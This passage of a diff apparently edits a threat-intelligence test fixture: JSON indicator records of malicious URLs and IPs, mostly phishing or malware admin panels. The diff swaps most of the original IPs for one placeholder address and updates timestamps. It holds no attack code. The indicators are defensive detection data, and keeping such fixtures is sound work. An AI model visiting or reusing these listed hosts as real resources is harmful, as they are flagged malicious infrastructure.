http://89.160.20.156/panel/panel/admin.php", "description": "TS ID: 55245868749; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime", "modified": "2020-01-23T03:03:05.048Z", "valid_from": "2020-01-23T03:03:05.048Z", @@ -2357,16 +2357,16 @@ "url": { "path": "/panel/panel/admin.php", "extension": "php", - "original": "http://104.168.99.168/panel/panel/admin.php", + "original": "http://89.160.20.156/panel/panel/admin.php", "scheme": "http", - "domain": "104.168.99.168", - "full": "http://104.168.99.168/panel/panel/admin.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/panel/panel/admin.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385281673Z", - "original": "{\"created\":\"2020-01-23T03:03:05.048Z\",\"description\":\"TS ID: 55245868749; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--677e714d-c237-42a1-b6b7-9145acd13eee\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-01-23T03:03:05.048Z\",\"name\":\"mal_url: http://104.168.99.168/panel/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://104.168.99.168/panel/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:03:05.048Z\"}", + "ingested": "2021-12-13T08:38:40.022835500Z", + "original": "{\"created\":\"2020-01-23T03:03:05.048Z\",\"description\":\"TS ID: 55245868749; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--677e714d-c237-42a1-b6b7-9145acd13eee\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-01-23T03:03:05.048Z\",\"name\":\"mal_url: http://89.160.20.156/panel/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/panel/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:03:05.048Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2417,7 +2417,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385286001Z", + "ingested": "2021-12-13T08:38:40.022843300Z", "original": "{\"created\":\"2020-01-23T03:03:15.734Z\",\"description\":\"TS ID: 55245868767; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--5baa1dbd-d74e-408c-92b5-0a9f97e4b87a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-01-23T03:03:15.734Z\",\"name\":\"mal_url: http://f0387404.xsph.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0387404.xsph.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:03:15.734Z\"}", "category": "threat", "type": "indicator", @@ -2469,7 +2469,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385290269Z", + "ingested": "2021-12-13T08:38:40.022850800Z", "original": "{\"created\":\"2020-01-23T03:03:42.599Z\",\"description\":\"TS ID: 55245868768; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--4563241e-5d2f-41a7-adb9-3925a5eeb1b1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-01-23T03:03:42.599Z\",\"name\":\"mal_url: http://a0386457.xsph.ru/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://a0386457.xsph.ru/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-23T03:03:42.599Z\"}", "category": "threat", "type": "indicator", @@ -2521,7 +2521,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385294437Z", + "ingested": "2021-12-13T08:38:40.022858400Z", "original": "{\"created\":\"2020-01-24T02:57:04.821Z\",\"description\":\"TS ID: 55250078037; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--70cb5d42-91d3-4efe-8c47-995fc0ac4141\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-01-24T02:57:04.821Z\",\"name\":\"mal_url: http://defenseisrael.com/dis/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://defenseisrael.com/dis/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:04.821Z\"}", "category": "threat", "type": "indicator", @@ -2540,7 +2540,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 91.215.170.249", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55250078030; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime", "modified": "2020-01-24T02:57:04.857Z", "valid_from": "2020-01-24T02:57:04.857Z", @@ -2562,12 +2562,12 @@ "first_seen": "2020-01-24T02:57:04.857Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "91.215.170.249" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385298675Z", - "original": "{\"created\":\"2020-01-24T02:57:04.857Z\",\"description\":\"TS ID: 55250078030; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime\",\"id\":\"indicator--3aa712bb-b5d4-4632-bf50-48a4aeeaeb6d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-24T02:57:04.857Z\",\"name\":\"mal_ip: 91.215.170.249\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '91.215.170.249']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:04.857Z\"}", + "ingested": "2021-12-13T08:38:40.022866100Z", + "original": "{\"created\":\"2020-01-24T02:57:04.857Z\",\"description\":\"TS ID: 55250078030; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime\",\"id\":\"indicator--3aa712bb-b5d4-4632-bf50-48a4aeeaeb6d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-24T02:57:04.857Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:04.857Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2617,7 +2617,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385303153Z", + "ingested": "2021-12-13T08:38:40.022873500Z", "original": "{\"created\":\"2020-01-24T02:57:04.883Z\",\"description\":\"TS ID: 55250078019; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--64227c7d-86ea-4146-a868-3decb5aa5f1d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-01-24T02:57:04.883Z\",\"name\":\"mal_url: http://lbfb3f03.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://lbfb3f03.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:04.883Z\"}", "category": "threat", "type": "indicator", @@ -2669,7 +2669,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385307231Z", + "ingested": "2021-12-13T08:38:40.022881Z", "original": "{\"created\":\"2020-01-24T02:57:12.997Z\",\"description\":\"TS ID: 55250078035; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--37fcf9a7-1a90-4d81-be0a-e824a4fa938e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-24T02:57:12.997Z\",\"name\":\"mal_url: http://byedtronchgroup.yt/jik/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://byedtronchgroup.yt/jik/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:12.997Z\"}", "category": "threat", "type": "indicator", @@ -2688,7 +2688,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://199.192.28.11/panel/admin.php", + "name": "mal_url: http://199.192.168.11/panel/admin.php", "description": "TS ID: 55250078008; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime", "modified": "2020-01-24T02:57:13.025Z", "valid_from": "2020-01-24T02:57:13.025Z", @@ -2713,16 +2713,16 @@ "url": { "path": "/panel/admin.php", "extension": "php", - "original": "http://199.192.28.11/panel/admin.php", + "original": "http://199.192.168.11/panel/admin.php", "scheme": "http", - "domain": "199.192.28.11", - "full": "http://199.192.28.11/panel/admin.php" + "domain": "199.192.168.11", + "full": "http://199.192.168.11/panel/admin.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385311419Z", - "original": "{\"created\":\"2020-01-24T02:57:13.025Z\",\"description\":\"TS ID: 55250078008; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--5a38786f-107e-4060-a7c9-ea8a5ded6aac\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-24T02:57:13.025Z\",\"name\":\"mal_url: http://199.192.28.11/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://199.192.28.11/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:13.025Z\"}", + "ingested": "2021-12-13T08:38:40.022886400Z", + "original": "{\"created\":\"2020-01-24T02:57:13.025Z\",\"description\":\"TS ID: 55250078008; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--5a38786f-107e-4060-a7c9-ea8a5ded6aac\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-24T02:57:13.025Z\",\"name\":\"mal_url: http://199.192.168.11/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://199.192.168.11/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:13.025Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2740,7 +2740,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://217.8.117.51/aW8bVds1/login.php", + "name": "mal_url: http://89.160.20.156/aW8bVds1/login.php", "description": "TS ID: 55250078038; iType: mal_url; State: active; Source: CyberCrime", "modified": "2020-01-24T02:57:32.901Z", "valid_from": "2020-01-24T02:57:32.901Z", @@ -2765,16 +2765,16 @@ "url": { "path": "/aW8bVds1/login.php", "extension": "php", - "original": "http://217.8.117.51/aW8bVds1/login.php", + "original": "http://89.160.20.156/aW8bVds1/login.php", "scheme": "http", - "domain": "217.8.117.51", - "full": "http://217.8.117.51/aW8bVds1/login.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/aW8bVds1/login.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385315827Z", - "original": "{\"created\":\"2020-01-24T02:57:32.901Z\",\"description\":\"TS ID: 55250078038; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--3eb79b31-1d6d-438c-a848-24a3407f6e32\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-24T02:57:32.901Z\",\"name\":\"mal_url: http://217.8.117.51/aW8bVds1/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://217.8.117.51/aW8bVds1/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:32.901Z\"}", + "ingested": "2021-12-13T08:38:40.022890500Z", + "original": "{\"created\":\"2020-01-24T02:57:32.901Z\",\"description\":\"TS ID: 55250078038; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--3eb79b31-1d6d-438c-a848-24a3407f6e32\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-24T02:57:32.901Z\",\"name\":\"mal_url: http://89.160.20.156/aW8bVds1/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/aW8bVds1/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:32.901Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -2824,7 +2824,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385320025Z", + "ingested": "2021-12-13T08:38:40.022895900Z", "original": "{\"created\":\"2020-01-24T02:57:32.929Z\",\"description\":\"TS ID: 55250078026; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--a050832c-db6e-49a0-8470-7a3cd8f17178\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-93\"],\"modified\":\"2020-01-24T02:57:32.929Z\",\"name\":\"mal_url: http://lansome.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://lansome.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:32.929Z\"}", "category": "threat", "type": "indicator", @@ -2876,7 +2876,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385324012Z", + "ingested": "2021-12-13T08:38:40.022903400Z", "original": "{\"created\":\"2020-01-24T02:57:49.028Z\",\"description\":\"TS ID: 55250078034; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--e88008f4-76fc-428d-831a-4b389e48b712\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-24T02:57:49.028Z\",\"name\":\"mal_url: http://iplusvietnam.com.vn/jo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://iplusvietnam.com.vn/jo/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:57:49.028Z\"}", "category": "threat", "type": "indicator", @@ -2928,7 +2928,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385328280Z", + "ingested": "2021-12-13T08:38:40.022910900Z", "original": "{\"created\":\"2020-01-24T02:58:03.345Z\",\"description\":\"TS ID: 55250078032; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--dafe91cf-787c-471c-9afe-f7bb20a1b93f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-01-24T02:58:03.345Z\",\"name\":\"mal_url: http://leakaryadeen.com/parl/id345/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://leakaryadeen.com/parl/id345/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:58:03.345Z\"}", "category": "threat", "type": "indicator", @@ -2980,7 +2980,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385332508Z", + "ingested": "2021-12-13T08:38:40.022918400Z", "original": "{\"created\":\"2020-01-24T02:58:16.318Z\",\"description\":\"TS ID: 55250078031; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime\",\"id\":\"indicator--232bdc34-44cb-4f41-af52-f6f1cd28818e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-24T02:58:16.318Z\",\"name\":\"mal_url: http://oaa-my.com/clap/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://oaa-my.com/clap/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:58:16.318Z\"}", "category": "threat", "type": "indicator", @@ -3032,7 +3032,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385336806Z", + "ingested": "2021-12-13T08:38:40.022923900Z", "original": "{\"created\":\"2020-01-24T02:58:16.358Z\",\"description\":\"TS ID: 55250078027; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--4adabe80-3be4-401a-948a-f9724c872374\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-66\"],\"modified\":\"2020-01-24T02:58:16.358Z\",\"name\":\"mal_url: http://thaubenuocngam.com/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://thaubenuocngam.com/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:58:16.358Z\"}", "category": "threat", "type": "indicator", @@ -3083,7 +3083,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385341155Z", + "ingested": "2021-12-13T08:38:40.022927600Z", "original": "{\"created\":\"2020-01-24T02:58:32.126Z\",\"description\":\"TS ID: 55250078013; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--1d7051c0-a42b-4801-bd7f-f0abf2cc125c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-24T02:58:32.126Z\",\"name\":\"mal_url: http://suspiciousactivity.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://suspiciousactivity.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:58:32.126Z\"}", "category": "threat", "type": "indicator", @@ -3102,7 +3102,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://217.8.117.8/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55250078017; iType: mal_url; State: active; Source: CyberCrime", "modified": "2020-01-24T02:58:37.603Z", "valid_from": "2020-01-24T02:58:37.603Z", @@ -3126,16 +3126,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://217.8.117.8/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "217.8.117.8", - "full": "http://217.8.117.8/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.385345523Z", - "original": "{\"created\":\"2020-01-24T02:58:37.603Z\",\"description\":\"TS ID: 55250078017; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--fb06856c-8aad-4fae-92fc-b73aae4f6dc7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-24T02:58:37.603Z\",\"name\":\"mal_url: http://217.8.117.8/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://217.8.117.8/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:58:37.603Z\"}", + "ingested": "2021-12-13T08:38:40.022931700Z", + "original": "{\"created\":\"2020-01-24T02:58:37.603Z\",\"description\":\"TS ID: 55250078017; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--fb06856c-8aad-4fae-92fc-b73aae4f6dc7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-24T02:58:37.603Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:58:37.603Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3185,7 +3185,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385349841Z", + "ingested": "2021-12-13T08:38:40.022936Z", "original": "{\"created\":\"2020-01-24T02:58:37.643Z\",\"description\":\"TS ID: 55250078012; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--33e674f5-a64a-48f4-9d8c-248348356135\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-01-24T02:58:37.643Z\",\"name\":\"mal_url: http://f0387550.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0387550.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:58:37.643Z\"}", "category": "threat", "type": "indicator", @@ -3236,7 +3236,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385354309Z", + "ingested": "2021-12-13T08:38:40.022941300Z", "original": "{\"created\":\"2020-01-24T02:58:39.465Z\",\"description\":\"TS ID: 55250078018; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--6311f539-1d5d-423f-a238-d0c1dc167432\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-01-24T02:58:39.465Z\",\"name\":\"mal_url: http://lf4e4abf.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://lf4e4abf.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:58:39.465Z\"}", "category": "threat", "type": "indicator", @@ -3255,7 +3255,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 206.217.131.245", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55250078033; iType: mal_ip; State: active; Org: ColoCrossing; Source: CyberCrime", "modified": "2020-01-24T02:59:02.031Z", "valid_from": "2020-01-24T02:59:02.031Z", @@ -3277,12 +3277,12 @@ "first_seen": "2020-01-24T02:59:02.031Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "206.217.131.245" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385359088Z", - "original": "{\"created\":\"2020-01-24T02:59:02.031Z\",\"description\":\"TS ID: 55250078033; iType: mal_ip; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--1c91f219-cfa6-44c7-a5ee-1c760489b43c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-24T02:59:02.031Z\",\"name\":\"mal_ip: 206.217.131.245\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '206.217.131.245']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:02.031Z\"}", + "ingested": "2021-12-13T08:38:40.022945400Z", + "original": "{\"created\":\"2020-01-24T02:59:02.031Z\",\"description\":\"TS ID: 55250078033; iType: mal_ip; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--1c91f219-cfa6-44c7-a5ee-1c760489b43c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-24T02:59:02.031Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:02.031Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3333,7 +3333,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385363366Z", + "ingested": "2021-12-13T08:38:40.022951800Z", "original": "{\"created\":\"2020-01-24T02:59:15.878Z\",\"description\":\"TS ID: 55250078010; iType: mal_url; State: active; Org: QuadraNet; Source: CyberCrime\",\"id\":\"indicator--c58983e2-18fd-47b8-aab4-6c8a2e2dcb35\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-01-24T02:59:15.878Z\",\"name\":\"mal_url: http://67.215.224.101/a1/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://67.215.224.101/a1/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:15.878Z\"}", "category": "threat", "type": "indicator", @@ -3352,7 +3352,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 162.241.73.163", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55250078000; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime", "modified": "2020-01-24T02:59:29.155Z", "valid_from": "2020-01-24T02:59:29.155Z", @@ -3374,12 +3374,12 @@ "first_seen": "2020-01-24T02:59:29.155Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "162.241.73.163" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.385367474Z", - "original": "{\"created\":\"2020-01-24T02:59:29.155Z\",\"description\":\"TS ID: 55250078000; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--1ab178a8-7991-4879-b9aa-8da49f40e92e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-58\"],\"modified\":\"2020-01-24T02:59:29.155Z\",\"name\":\"mal_ip: 162.241.73.163\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '162.241.73.163']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:29.155Z\"}", + "ingested": "2021-12-13T08:38:40.022956800Z", + "original": "{\"created\":\"2020-01-24T02:59:29.155Z\",\"description\":\"TS ID: 55250078000; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--1ab178a8-7991-4879-b9aa-8da49f40e92e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-58\"],\"modified\":\"2020-01-24T02:59:29.155Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:29.155Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -3429,7 +3429,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.385371481Z", + "ingested": "2021-12-13T08:38:40.022962200Z", "original": "{\"created\":\"2020-01-24T02:59:50.233Z\",\"description\":\"TS ID: 55250078020; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--d5bdff38-6939-4a47-8e11-b910520565c4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-78\"],\"modified\":\"2020-01-24T02:59:50.233Z\",\"name\":\"mal_url: http://l60bdd58.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://l60bdd58.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T02:59:50.233Z\"}", "category": "threat", "type": "indicator", @@ -3448,7 +3448,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://107.175.150.73/~giftioz/.azma/panel/admin.php", + "name": "mal_url: http://89.160.20.156/~giftioz/.azma/panel/admin.php", "description": "TS ID: 55250078009; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime", "modified": "2020-01-24T02:59:50.255Z", "valid_from": "2020-01-24T02:59:50.255Z", @@ -3473,16 +3473,16 @@ "url": { "path": 